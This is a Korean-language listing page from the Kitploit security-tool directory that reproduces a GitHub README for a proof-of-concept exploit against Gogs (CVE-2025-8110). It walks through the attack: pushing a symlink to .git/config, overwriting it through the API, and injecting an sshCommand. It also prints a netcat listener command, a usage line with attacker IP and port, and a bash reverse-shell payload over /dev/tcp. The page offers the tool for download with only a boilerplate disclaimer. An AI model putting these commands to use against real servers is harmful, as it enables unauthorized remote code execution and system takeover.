Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-8110 — CVE-2025-8110에 대한 개념 증명 익스플로잇으로, 심볼릭 링크를 통한 경로 탐색과 sshCommand 주입을 이용하여 리버스 셸을 전달하는 Gogs RCE 취약점입니다. | Kitploit
도구/GitHubGitHub/ghxstsec/cve-2025-8110
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubghxstsec/cve-2025-8110

CVE-2025-8110

CVE-2025-8110에 대한 개념 증명 익스플로잇으로, 심볼릭 링크를 통한 경로 탐색과 sshCommand 주입을 이용하여 리버스 셸을 전달하는 Gogs RCE 취약점입니다.

저장소 보기
534개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Gogs RCE 익스플로잇 (CVE-2025-8110)

Python License Expertise

심볼릭 링크 우회 및 sshCommand 주입을 통해 .git/config 조작으로 원격 코드 실행(RCE)을 가능하게 하는 Gogs의 심각한 취약점 CVE-2025-8110에 대한 개념 증명(PoC)입니다.

📖 개요

이 익스플로잇은 Gogs API 콘텐츠 관리의 경로 탐색(Path Traversal) 취약점을 대상으로 합니다. 인증된 사용자는 다음을 수행할 수 있습니다:

  1. 저장소를 생성하고 내부 .git/config를 가리키는 심볼릭 링크를 푸시합니다.
  2. API를 사용하여 심볼릭 링크를 통해 대상 설정 파일을 덮어씁니다.
  3. 서버가 Git 작업을 수행할 때 리버스 셸을 실행하기 위해 악성 sshCommand를 주입합니다.

🚀 특징

  • 자동화된 워크플로우: 로그인, 저장소 생성, 심볼릭 링크 배포 및 포이즈닝을 처리합니다.
  • 강력한 인코딩: 특수 문자(예: !, @)를 처리하기 위해 자격 증명을 자동으로 URL 인코딩합니다.
  • 풍부한 출력: Rich 라이브러리를 사용한 고가시성 로깅.

🛠 사전 요구 사항

  • Python 3.12+
  • 로컬 시스템에 Git이 설치되어 있어야 합니다.
  • 대상 Gogs 인스턴스의 유효한 자격 증명.

📦 설치

  1. 저장소를 클론합니다:

    root@kitploit:~
    git clone https://github.com/Ghxstsec/CVE-2025-8110.git
    cd CVE-2025-8110
    
  2. 종속성을 설치합니다:

    root@kitploit:~
    pip3 install -r requirements.txt
    

💻 사용법

리스너를 시작합니다:

root@kitploit:~
nc -lvnp 6666

익스플로잇을 실행합니다:

root@kitploit:~
python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh <YOUR_IP> -lp 6666 -p 'YourPassword123!'

인수:

취약점의 핵심:

root@kitploit:~
sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #

Gogs가 네트워크 전송이 필요한 Git 명령(예: 미러 동기화 또는 내부 참조 검사)을 실행할 때, sshCommand를 호출하여 리버스 셸을 트리거합니다.

⚠️ 법적 고지: 이 도구는 교육 및 승인된 보안 테스트 목적으로만 사용됩니다. 저자는 이 스크립트의 오용이나 손해에 대해 책임을 지지 않습니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다.

도구 다운로드
인수설명
-u, --url대상 Gogs 인스턴스의 기본 URL (예: http://target.htb:3000).
-lh, --host리버스 셸이 연결될 공격자 IP (LHOST).
-lp, --port머신에 구성된 리스너 포트 (LPORT).
-p, --password인증을 수행하기 위한 pwnuser 계정의 비밀번호.
-x, --proxy(선택 사항) 로컬 프록시를 통해 트래픽을 라우팅합니다 (기본값: http://localhost:8080).